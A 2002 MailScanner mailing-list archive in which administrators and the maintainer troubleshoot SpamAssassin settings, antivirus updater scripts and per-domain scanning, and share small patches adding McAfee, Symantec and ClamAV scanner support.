>This message has been scanned for viruses and >dangerous content by MailScanner, and is >believed to be clean. > > >-- >This message has been scanned for viruses and >dangerous content by MailScanner, and is >believed to be clean. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From paul_houselander at BRISTOL-LEA.ORG.UK Mon Sep 23 15:18:53 2002 From: paul_houselander at BRISTOL-LEA.ORG.UK (Paul Houselander) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00.0a4 References: <5.1.0.14.2.20020923141642.04906840@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020923145441.04ac6448@imap.ecs.soton.ac.uk> Message-ID: <029501c2630c$256923c0$7b10140a@education.bcc.lan> My original question was >>If "Use SpamAssassin = no" and "Load SpamAssassin = yes" in mailscanner.conf, it does try to use >>spamassasin. I would have expected the "Use SpamAssassin = no" to have precedence. The default in the file was Use SpamAssassin = yes Load SpamAssassin = yes So when the error message first appeared I just set Use SpamAssassin = no And expected it not to do anything with Spam Assassin, however the error continued untill Load SpamAssassin = no I know its a very simple problem and easy to just set both to no, and thinking about it now I imagine the default when you do a release will be no/no so the problem after someone first installs it, will not occur. Im just used to the "master" switch of "Use SpamAssassin". ----- Original Message ----- From: "Julian Field" To: Sent: Monday, September 23, 2002 2:56 PM Subject: Re: Version 4.00.0a4 > At 14:43 23/09/2002, you wrote: > >Thanks > > > >If I start with "Load SpamAssasin = yes" I get > > > >Can't locate Mail/SpamAssassin.pm in @INC (@INC contains: > >/opt/MailScanner/bin /usr/lib/perl5/5.6.0/i386-linux /usr/lib/perl5/5.6.0 > >/usr/lib/perl5/site_perl/5.6.0/i386-linux /usr/lib/perl5/site_perl/5.6.0 > >/usr/lib/perl5/site_perl .) at MailScanner/SA.pm line 69 > > Have you installed SpamAssassin? If not, then I would fully expect "Load > SpamAssassin=yes" to fail. > > >Also just noticed I got > > > >We haven't got any child processes, which isn't right!, No child processes > >at /opt/MailScanner/bin/mailscanner line 174. > >We have just tried to reap a process which wasn't one of ours!, No child > >processes at /opt/MailScanner/bin/mailscanner line 177. > > This is because it is aborting while trying to load SpamAssassin. If you > haven't got it installed, then clearly(?) you need to set "Load > SpamAssassin = no". > > >Seems fine if I set to "Load SpamAssasin = no" > > > >I dont have spamassasin installed. > > Aha! Don't tell it to load software you haven't got. Surprisingly enough it > fails :-) > >----- Original Message ----- > >From: Julian Field > >To: MAILSCANNER@JISCMAIL.AC.UK > >Sent: Monday, September 23, 2002 2:22 PM > >Subject: Re: Version 4.00.0a4 > > > >At 12:49 23/09/2002, you wrote: > >>Just trying it out on a totally fresh server. > >> > >>Looks really good, comments are > >> > >>1. Sophos.install - does not point to the new location for sophos-wrapper > >>and sophos-autoupdate scripts. > >Fixed. > > > >>2. If "Use SpamAssassin = no" and "Load SpamAssassin = yes" in > >>mailscanner.conf, it does try to use spamassasin. I would have expected > >>the "Use SpamAssassin = no" to have precedence. > >Does it try to use it, or just try to load it? > >Working out whether "Use SpamAssassin" is yes or no is no longer easy > >because it could be a ruleset rather than a simple value. That's why I put > >in the "Load SpamAssassin" option in, as that has to be just yes or no. > > > >>Im very interested in the ability to do different signatures for > >>different domains, and will be trying that out next, I was looking at the > >>example and it seemed to apply for outgoing mail only e.g. > >> > >> From: *@domain1.com > >> /opt/MailScanner/etc/reports/domain1.sig.txt > >> From: *@domain2.com > >> /opt/MailScanner/etc/reports/domain2.sig.txt > >> > >>Does this work for for To: as well? e.g. > >> > >> To: *@domain1.com > >> /opt/MailScanner/etc/reports/domain1.sig.txt > >> To: *@domain2.com > >> /opt/MailScanner/etc/reports/domain2.sig.txt > >You can have "from", "to" or "fromto" or "tofrom" etc in the first field. > >It just looks at the first word for the word "from" and for the word "to" > >so if you want both then you can combine them how you like. So I would do > > FromTo: *@domain1.com > > /opt/MailScanner/etc/reports/domain1.sig.txt > > FromTo: *@domain2.com > > /opt/MailScanner/etc/reports/domain2.sig.txt > > > >Don't forget to set the HTML sigs as well as the txt ones. > >-- > >Julian Field Teaching Systems Manager > >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > >Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > >-- > >This message has been scanned for viruses and > >dangerous content by MailScanner, and is > >believed to be clean. > > > > > >-- > >This message has been scanned for viruses and > >dangerous content by MailScanner, and is > >believed to be clean. > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > > -- > This message has been scanned for viruses and > dangerous content by MailScanner, and is > believed to be clean. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. From hciss at HCIWS.COM Mon Sep 23 15:56:01 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:44 2006 Subject: Virus Sent From My Subnet References: <5.1.0.14.2.20020920190113.036f5d48@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020923094048.0247e2f0@imap.ecs.soton.ac.uk> Message-ID: <00e301c26311$58acaae0$6701a8c0@matthew> > >Will this be a possible config option in version 4? This does solve the > >problem quite nicely. > > Is it really worth making an extra config item for it? Why not just do it > for all the "notices"? It doesn't get sent to users, only sysadmins, so a > bit of extra info shouldn't do any harm. I just realized something. Sendmail does a reverse dns lookup on all connections. If the virus originated in any of my IP pool's it will have my reverse DNS lookup in it. I can just search for that. Matt From LISTSERV at JISCMAIL.AC.UK Mon Sep 23 15:27:48 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:44 2006 Subject: MAILSCANNER: sjaaknabuurs@CITYTOWER.COM left the list Message-ID: <200209231427.PAA12180@magpie.ecs.soton.ac.uk> Mon, 23 Sep 2002 15:27:48 sjaaknabuurs@CITYTOWER.COM has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Mon, 23 Sep 2002 15:27:48 +0100 Received: from mail.sjaca.nl ([212.204.230.241]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8NERjr25405 for ; Mon, 23 Sep 2002 15:27:45 +0100 Received: (from root@localhost) by mail.sjaca.nl (8.11.6/8.11.6) id g8NERjA02184; Mon, 23 Sep 2002 16:27:45 +0200 Date: Mon, 23 Sep 2002 16:27:45 +0200 From: sjaak nabuurs Message-Id: <200209231427.g8NERjA02184@mail.sjaca.nl> Subject: leave * To: LISTSERV@JISCMAIL.AC.UK Cc: X-Originating-IP: 212.104.194.5 X-Mailer: Webmin 0.92 MIME-Version: 1.0 X-LSVline1: leave * From rob at CSCONSULTANTS.NET Mon Sep 23 16:20:12 2002 From: rob at CSCONSULTANTS.NET (Rob Lundberg) Date: Thu Jan 12 21:15:44 2006 Subject: Kaspersky 4.0.1.0 Message-ID: <1032794413.4240.12.camel@rh73wkstn.csconsultants.net> Anything new on support for Kaspersky ver 4.0.1.0 ? I am trying to get Kaspersky to work properly with Mailscanner to no avail. The kavscanner runs fine manually, but when it is called by the wrapper it never completes a scan. I have Mailscanner ver 3.22-14 running on a RH 7.2 box, it works fine with Sophos but when I make the changes for kaspersky I get "Commercial scanner kaspersky times out!" and "Denial Of Service attack detected!" I was using the eicar test file. From jim at ENTROPHY-FREE.NET Mon Sep 23 16:12:56 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:44 2006 Subject: RBL checks Message-ID: <1032793977.1791.36.camel@wilowisp.dynetics.com> mailscanner.conf includes: # If the message sender is on any of the Spam Lists, do you still want # to do the SpamAssassin checks? Setting this to "no" will reduce the load # on your server, but will stop the High Scoring Spam Actions from ever # happening. # This can also be the filename of a ruleset. Check SpamAssassin If On Spam List = yes Is is possible to define actions to be taken in the ruleset based of which DNS list matched? I.e., can I send a bounce including text indicating what DNS list the sender is on? And if so what would the ruleset look like? -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From andersan at LTKALMAR.SE Mon Sep 23 16:17:34 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:44 2006 Subject: SV: Mcafee update prob Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB4B@lkl22.ltkalmar.se> > -----Ursprungligt meddelande----- > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > Skickat: den 23 september 2002 16:02 > Till: MAILSCANNER@JISCMAIL.AC.UK > ?mne: Re: Mcafee update prob > > > At 14:44 23/09/2002, you wrote: > >H > >Sorry for posting again but Im gona show the boss the > >setup tomorrow and I cant get the autoupdate to work. > >Spent all morning trying to figure out where the script > >go bad but my skills is to low =( > >This is the msg I get: > >Mcafee update failed: cannot find the the update file, at > ./autoupdate line > >93 > > I've just tried the US site and it is running extremely > slowly, so the FTP > commands are timing out. Edit the autoupdate script, and look > right near > the top of the file. There are a couple of lines that say > > #my($ftpsite) = 'ftpeur.nai.com'; # Use faster European > mirror instead of > my($ftpsite) = 'ftp.nai.com'; # busy US site Did a fast installation on another comp and as you said the sites are so slow Im down to 200 b/s. But at least the script work. So I took the script and moved it to the server Im about to show but there I get the same message. So I guess there have to be something with wrong with my pearl but I cant figure out what!!! =( Any other things I might try, could it be that Im missing Net::FTP? Last time I tried to install it I broke my comp =) so I hope thats not it... /Anders > > Move the "#" from the first line to the second one, and > you'll be using the > European mirror site instead, which is working very quickly > at the moment. > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From paul_houselander at BRISTOL-LEA.ORG.UK Mon Sep 23 16:27:57 2002 From: paul_houselander at BRISTOL-LEA.ORG.UK (Paul Houselander) Date: Thu Jan 12 21:15:44 2006 Subject: Kaspersky 4.0.1.0 References: <1032794413.4240.12.camel@rh73wkstn.csconsultants.net> Message-ID: <033501c26315$cb8131e0$7b10140a@education.bcc.lan> Try these Im using 4.0.1.0 and got the same problem with the kaspersky, someone from this mail list sent me these files and it works fine. Paul ----- Original Message ----- From: "Rob Lundberg" To: Sent: Monday, September 23, 2002 4:20 PM Subject: Kaspersky 4.0.1.0 > Anything new on support for Kaspersky ver 4.0.1.0 ? I am trying to get > Kaspersky to work properly with Mailscanner to no avail. The kavscanner > runs fine manually, but when it is called by the wrapper it never > completes a scan. I have Mailscanner ver 3.22-14 running on a RH 7.2 > box, it works fine with Sophos but when I make the changes for kaspersky > I get "Commercial scanner kaspersky times out!" and "Denial Of Service > attack detected!" I was using the eicar test file. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -------------- next part -------------- A non-text attachment was scrubbed... Name: kaspersky.prf Type: application/pics-rules Size: 1988 bytes Desc: not available Url : http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020923/d1dfffc9/kaspersky.bin -------------- next part -------------- A non-text attachment was scrubbed... Name: kasperskywrapper Type: application/octet-stream Size: 3977 bytes Desc: not available Url : http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020923/d1dfffc9/kasperskywrapper.obj From LISTSERV at JISCMAIL.AC.UK Mon Sep 23 16:25:43 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:44 2006 Subject: MAILSCANNER: devin@JETDATA.CA requested to join Message-ID: <200209231525.QAA19637@magpie.ecs.soton.ac.uk> Mon, 23 Sep 2002 16:25:43 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Devin Smith . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER devin@JETDATA.CA Devin Smith The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+devin%40JETDATA.CA+Devin+Smith&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mailscanner at ecs.soton.ac.uk Mon Sep 23 17:10:57 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: Fix in uvscan/autoupdate Message-ID: <5.1.0.14.2.20020923170931.09493cf8@imap.ecs.soton.ac.uk> There appears to have been a change in the syntax of the McAfee uvscan program, which means that the "autoupdate" script for it will bail out with a "no target specified for scanning" error. To fix this, just apply this tiny change to uvscan/autoupdate (or lib/mcafee-autoupdate in V4). --- autoupdate.old Mon Sep 23 11:01:01 2002 +++ autoupdate Mon Sep 23 11:11:31 2002 @@ -66,7 +66,7 @@ # to see if the new dat's are o.k attempt to run mcafee with them and # check for errors print STDERR "About to run mcafee\n"; -open(MCAFEETEST, "$mcafee -d $mcafeeroot | "); +open(MCAFEETEST, "$mcafee -d $mcafeeroot . | "); print STDERR "Running mcafee\n"; while(){ chomp; -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From andersan at LTKALMAR.SE Mon Sep 23 17:59:46 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:44 2006 Subject: SV: Fix in uvscan/autoupdate Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB4D@lkl22.ltkalmar.se> As the bad perl knowledge I got I need to ask where these lines are supposed to be in the script? /Anders > -----Ursprungligt meddelande----- > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > Skickat: den 23 september 2002 18:11 > Till: MAILSCANNER@JISCMAIL.AC.UK > ?mne: Fix in uvscan/autoupdate > > > There appears to have been a change in the syntax of the McAfee uvscan > program, which means that the "autoupdate" script for it will > bail out with > a "no target specified for scanning" error. > > To fix this, just apply this tiny change to uvscan/autoupdate (or > lib/mcafee-autoupdate in V4). > > --- autoupdate.old Mon Sep 23 11:01:01 2002 > +++ autoupdate Mon Sep 23 11:11:31 2002 > @@ -66,7 +66,7 @@ > # to see if the new dat's are o.k attempt to run mcafee > with them and > # check for errors > print STDERR "About to run mcafee\n"; > -open(MCAFEETEST, "$mcafee -d $mcafeeroot | "); > +open(MCAFEETEST, "$mcafee -d $mcafeeroot . | "); > print STDERR "Running mcafee\n"; > while(){ > chomp; > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From rvitoria at CI.UCP.PT Mon Sep 23 18:32:48 2002 From: rvitoria at CI.UCP.PT (Rui Vit=?ISO-8859-1?Q?=F3ria?=) Date: Thu Jan 12 21:15:44 2006 Subject: ignoring text in character set `WINDOWS-1252' Message-ID: <200209231732.g8NHWnr23795@ori.rl.ac.uk> Hi, I`ve this error in my server. ignoring text in character set `WINDOWS-1252' at /usr/lib/perl5/site_perl/5.6.1/MIME/Parser/Filer.pm line 646 Somebody can help me???? Rgdrs From devin at JETDATA.CA Mon Sep 23 18:50:38 2002 From: devin at JETDATA.CA (Devin Smith) Date: Thu Jan 12 21:15:44 2006 Subject: Problem with per-domain scanning Message-ID: <003001c26329$bd7cd900$7f00000a@rd.csandall.com> I am presently setting up MailScanner with SpamAssassin to do per-domain scanning. If I enable the per domain scanning, MailScanner seems to ignore the file that has the list of domains. I have checked the paths, and the path in the mailscanner.conf does indeed point to the correct file. I've tried stopping all sendmail services and mailscanner, and restarting, but still the same result. It DOES tag the email, saying it was not scanned - so I know MailScanner is indeed still processing the mail. In my domains.to.scan.conf file, I have listed the domains as such: *.domain1.tld domain2.tld ..and it still ignores on all counts. If I tell the system to scan all emails and not use the domains.to.scan.conf file, it does indeed work and scans and tags everything like it should. Any ideas? Devin -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020923/463c2abd/attachment.html From thomas_duvally at BROWN.EDU Mon Sep 23 20:01:01 2002 From: thomas_duvally at BROWN.EDU (Thomas DuVally) Date: Thu Jan 12 21:15:44 2006 Subject: sweep and Norton In-Reply-To: <20020920070957.GC6315@hoiho.nz.lemon-computing.com> References: <1032445606.1634.15.camel@toms> <1032465987.2200.26.camel@toms> <20020920070957.GC6315@hoiho.nz.lemon-computing.com> Message-ID: <1032807661.2014.29.camel@toms> Nick, It sounds as if you guys are much too far along to bother with this is this release. It's an awful hack and would need a lot more work to make it useful for anyone not willing to spend an hour tweaking it. I've made it work at my site. That's all I know how to do at the moment, but I am planning on making it a little more portable. I just wanted to let you and anyone else interested that it is possible. I'm going to try it with v4 soon, but after i get 3.22 in production (couple weeks). Attached are the patch and a README file. Thanks! On Fri, 2002-09-20 at 03:09, Nick Phillips wrote: > > Yeah, why not, it certainly won't do any harm, and it might give one > of us an idea or two... we've postponed modularising the scanning functions > until the next major release so as to get this one (v4) out of the door > in a reasonable time, so even if it's not practical to merge it all in > now, we can bear it in mind then... > -- Tom DuVally Lead Sys. Programmer CIS, Brown University p 401-863-9466 -------------- next part -------------- MailScanner sweep.pl patch ----------------------------------------------- This patch is for MailScanner-3.22.14. It gives MailScanner the ability to use Symantecs Carrier Scan Server and Command Line Scanner. ---------------------------------------------------------------------- Nortons Carrier Scan is a deamon based, network based scanning service. Applications would send files over the network to be scanned and expect a response. Symantec also created a command line tool for Unix to access the service. Changes made to sweep.pl to force compatibility with Norton/Symantec likely makes it incompatible with other scanners. Explination of changes: - Created hash for "symcmd" uses -i 1 level of output uses -l for local scanning - scanner now needs absolute path to directoy - Created Parser created two global tmp variable for output does nothing, like most of the parsers seem to - Created output processer included sample output looks for line beginning inf if "infected" store in tmp variable if "info: store in another tmp variable assign tmps to infected and report, respectively if report assigned, split path - this is hard coded to be root and four dirs. undef tmp variable for next output - Make command call contain BaseDir needed for -l local scanning -------------- next part -------------- A non-text attachment was scrubbed... Name: norton-sweep.diff Type: text/x-patch Size: 5132 bytes Desc: not available Url : http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020923/9aec717d/norton-sweep.bin From brose at MED.WAYNE.EDU Mon Sep 23 20:35:07 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:44 2006 Subject: V4 and viruses to delete Message-ID: What would be an example for the rule file for this option to work? From hciss at HCIWS.COM Mon Sep 23 20:49:46 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:44 2006 Subject: F-Prot Autoupdate Message-ID: <00ec01c2633a$61d1fd40$6701a8c0@matthew> Using the autoupdate script below I always get the error: "f-prot-zip-update.sh: : Ambiguous redirect" whenever it updates. Although it does work and update I just get the error message in admin account. http://uk2raq.com/updates/f-prot-zip-update.sh Using the perl update script for F-prot provided by MailScanner I always get: "Unknown fatal error calling "checksum", exiting., Bad file descriptor at autoupdate line 294, chunk 2.". Anyone have an answer? Matt From mike at CAMAROSS.NET Mon Sep 23 21:39:52 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00.0a4 In-Reply-To: <5.1.0.14.2.20020923145441.04ac6448@imap.ecs.soton.ac.uk> Message-ID: Julian, When you are making changes to the code for the V4 generation, are you only changing bin/mailscanner, or do I need everything within the tarball each time? I'm thinking about just symlinking /opt/MailScanner to whatever the tarball creates when I extract it and then copying my mailscanner.conf back over. -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Julian Field Sent: Monday, September 23, 2002 8:57 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Version 4.00.0a4 At 14:43 23/09/2002, you wrote: >Thanks > >If I start with "Load SpamAssasin = yes" I get > >Can't locate Mail/SpamAssassin.pm in @INC (@INC contains: >/opt/MailScanner/bin /usr/lib/perl5/5.6.0/i386-linux /usr/lib/perl5/5.6.0 >/usr/lib/perl5/site_perl/5.6.0/i386-linux /usr/lib/perl5/site_perl/5.6.0 >/usr/lib/perl5/site_perl .) at MailScanner/SA.pm line 69 Have you installed SpamAssassin? If not, then I would fully expect "Load SpamAssassin=yes" to fail. >Also just noticed I got > >We haven't got any child processes, which isn't right!, No child processes >at /opt/MailScanner/bin/mailscanner line 174. >We have just tried to reap a process which wasn't one of ours!, No child >processes at /opt/MailScanner/bin/mailscanner line 177. This is because it is aborting while trying to load SpamAssassin. If you haven't got it installed, then clearly(?) you need to set "Load SpamAssassin = no". >Seems fine if I set to "Load SpamAssasin = no" > >I dont have spamassasin installed. Aha! Don't tell it to load software you haven't got. Surprisingly enough it fails :-) >----- Original Message ----- >From: Julian Field >To: MAILSCANNER@JISCMAIL.AC.UK >Sent: Monday, September 23, 2002 2:22 PM >Subject: Re: Version 4.00.0a4 > >At 12:49 23/09/2002, you wrote: >>Just trying it out on a totally fresh server. >> >>Looks really good, comments are >> >>1. Sophos.install - does not point to the new location for sophos-wrapper >>and sophos-autoupdate scripts. >Fixed. > >>2. If "Use SpamAssassin = no" and "Load SpamAssassin = yes" in >>mailscanner.conf, it does try to use spamassasin. I would have expected >>the "Use SpamAssassin = no" to have precedence. >Does it try to use it, or just try to load it? >Working out whether "Use SpamAssassin" is yes or no is no longer easy >because it could be a ruleset rather than a simple value. That's why I put >in the "Load SpamAssassin" option in, as that has to be just yes or no. > >>Im very interested in the ability to do different signatures for >>different domains, and will be trying that out next, I was looking at the >>example and it seemed to apply for outgoing mail only e.g. >> >> From: *@domain1.com >> /opt/MailScanner/etc/reports/domain1.sig.txt >> From: *@domain2.com >> /opt/MailScanner/etc/reports/domain2.sig.txt >> >>Does this work for for To: as well? e.g. >> >> To: *@domain1.com >> /opt/MailScanner/etc/reports/domain1.sig.txt >> To: *@domain2.com >> /opt/MailScanner/etc/reports/domain2.sig.txt >You can have "from", "to" or "fromto" or "tofrom" etc in the first field. >It just looks at the first word for the word "from" and for the word "to" >so if you want both then you can combine them how you like. So I would do > FromTo: *@domain1.com > /opt/MailScanner/etc/reports/domain1.sig.txt > FromTo: *@domain2.com > /opt/MailScanner/etc/reports/domain2.sig.txt > >Don't forget to set the HTML sigs as well as the txt ones. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ >-- >This message has been scanned for viruses and >dangerous content by MailScanner, and is >believed to be clean. > > >-- >This message has been scanned for viruses and >dangerous content by MailScanner, and is >believed to be clean. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From brose at MED.WAYNE.EDU Mon Sep 23 22:20:42 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00.0a4 and Spamassassin Checks Message-ID: I'm testing on a test system that I had 3.2x on and I'm noticing that it doesn't seem to be running all the SA tests, such as DCC, Razor or Pyzor. Does anyone notice this? -=Bobby From brose at MED.WAYNE.EDU Mon Sep 23 22:27:26 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:44 2006 Subject: V4 and viruses to delete option Message-ID: What would be an example for the rule file for this option to work? -=Bobby From info at BLACKNIGHT-SOLUTIONS.COM Mon Sep 23 22:39:12 2002 From: info at BLACKNIGHT-SOLUTIONS.COM (Blacknight Solutions) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00.0a4 and Spamassassin Checks In-Reply-To: Message-ID: <5.1.1.6.0.20020923233846.00b03320@blacknightsolutions.com> Have you reinstalled SpamAssassin? I had the same problem until I did a fresh install. At 17.20 23/09/2002 -0400, you wrote: >I'm testing on a test system that I had 3.2x on and I'm noticing that it >doesn't seem to be running all the SA tests, such as DCC, Razor or >Pyzor. Does anyone notice this? > >-=Bobby Mr. Michele Neylon Blacknight Solutions - affordable linux hosting http://www.blacknightsolutions.com/ From LISTSERV at JISCMAIL.AC.UK Mon Sep 23 18:21:33 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:44 2006 Subject: MAILSCANNER: r.westlake@MAIL.CRYST.BBK.AC.UK requested to join Message-ID: <200209231721.SAA02758@magpie.ecs.soton.ac.uk> Mon, 23 Sep 2002 18:21:33 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Richard Westlake . The following subscription options have been requested: NOHTML MIME DIGEST. You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER r.westlake@MAIL.CRYST.BBK.AC.UK Richard Westlake The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+r.westlake%40MAIL.CRYST.BBK.AC.UK+Richard+Westlake&L=MAILSCANNER This first link will add the subscriber to the list. You can then set the subscription options with this link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=SET+MAILSCANNER+NOHTML+MIME+DIGEST+FOR+r.westlake%40MAIL.CRYST.BBK.AC.UK&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From jim at ENTROPHY-FREE.NET Mon Sep 23 22:49:43 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00.0a4 In-Reply-To: References: Message-ID: <1032817783.27510.9.camel@chaos.entrophy-free.net> On Mon, 2002-09-23 at 15:39, Mike Kercher wrote: > Julian, > > When you are making changes to the code for the V4 generation, are you only changing bin/mailscanner, or do I need everything within > the tarball each time? I'm thinking about just symlinking /opt/MailScanner to whatever the tarball creates when I extract it and > then copying my mailscanner.conf back over. > That would be one way, but you'd have to check for changes in mailscanner.conf each time and possibly in other things that live in /etc. What I do is to keep the previous version's download in someplace other than my 'running' directory. When a new version is released I unpack it and 'diff -r previous current' (e.g. diff -r MailScanner-4.00.0a3 MailScanner-4.00.0a4). That will show all changed files and what changed. If the change occurs in a config file that I've modified in my running copy I can adjust as necessary. My running copy (/opt/MailScanner) is just a symlink to the actual stuff (/opt/MailScanner-4.00.0a4). So I copy the contents from where I unpacked the download to /opt, merge in my mailscanner.conf and other local configs, and change the symlink. -- The instructions said to use Windows 98 or better, so I installed RedHat. From sean at NISD.NET Mon Sep 23 23:11:20 2002 From: sean at NISD.NET (Sean Embry) Date: Thu Jan 12 21:15:44 2006 Subject: Users' Comments Book Message-ID: Julian's so good, not only can he code a new rev, he can back port goodies to the old rev, he can ALSO install new software on the web site. He's secretly an octopus overdosing on caffeine, and has four computers going full blast all the time! Sean >>> mailscanner@ECS.SOTON.AC.UK 09/23/02 08:08AM >>> I have just installed a guestbook on the web site, so if some if you could add some comments to it to let the rest of the world know what you think of MailScanner (and my support efforts) it would be greatly appreciated. I intend it to become a place where potential new users can go to find out about other people already using it, and what they think of it. It's not a place to post feature requests or support questions. It's at http://www.sng.ecs.soton.ac.uk/mailscanner/book (linked straight off www.mailscanner.info) Thanks folks! -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From adrian at SMOP.CO.UK Mon Sep 23 23:12:35 2002 From: adrian at SMOP.CO.UK (Adrian Bridgett) Date: Thu Jan 12 21:15:44 2006 Subject: clamav support for mailscanner (patch) Message-ID: <20020923221235.GA22190@smop.co.uk> Here's mark II, new and improved (i.e. it works and has actually been tested now). Tested only lightly, so not for submission yet, OTOH if anyone goes a hunting for this then the mailing list is a good place to start so that's why I'm posting it :-) As proof, here's a sample log (with debug added which is gone from the patch attached) (lines not wrapped) Sep 23 22:31:49 localhost mailscanner[22000]: clamav for 17tanp-0005iw-00 :: foo.zip = "contains ClamAV-Test-Signature in test1 (possibly others)" Sep 23 22:31:49 localhost mailscanner[22000]: clamav for 17tanp-0005iw-00 :: test1 = "contains ClamAV-Test-Signature" Sep 23 22:31:49 localhost mailscanner[22000]: clamav for 17tanp-0005iw-00 :: test2.zip = "contains ClamAV-Test-Signature in clamtest (possibly others)" Sep 23 22:31:49 localhost mailscanner[22000]: Found 3 viruses in messages 17tanp-0005iw-00 And ... (the possibly others remark is because clamscan stops as soon as it finds a virus). The following e-mail messages were found to have viruses in them: Sender: Recipient: adrian@localhost Subject: v10 MessageID: 17tbNx-0005pQ-00 Report: test1 contains ClamAV-Test-Signature Report: foo.zip contains ClamAV-Test-Signature in test1 (possibly others) Report: test2.zip contains ClamAV-Test-Signature in clamtest (possibly others) Adrian Email: adrian@smop.co.uk Windows NT - Unix in beta-testing. GPG/PGP keys available on public key servers Debian GNU/Linux -*- By professionals for professionals -*- www.debian.org -------------- next part -------------- diff -ru 3.22.orig/etc/mailscanner/mailscanner.conf 3.22/etc/mailscanner/mailscanner.conf --- 3.22.orig/etc/mailscanner/mailscanner.conf 2002-09-11 23:51:48.000000000 +0100 +++ 3.22/etc/mailscanner/mailscanner.conf 2002-09-18 22:22:37.000000000 +0100 @@ -119,6 +119,7 @@ # panda from www.pandasoftware.com, or # rav from www.ravantivirus.com, or # antivir from www.antivir.de, or +# clamav from clamav.elektrapro.com or # none # # Note: If you want to use multiple virus scanners, then this should be a diff -uN /tmp/apb/3.22-orig/etc/mailscanner/wrapper/clamavwrapper etc/mailscanner/wrapper/clamavwrapper --- 3.22.orig/etc/mailscanner/wrapper/clamavwrapper 1970-01-01 01:00:00.000000000 +0100 +++ 3.22/etc/mailscanner/wrapper/clamavwrapper 2002-09-18 22:11:12.000000000 +0100 @@ -0,0 +1,48 @@ 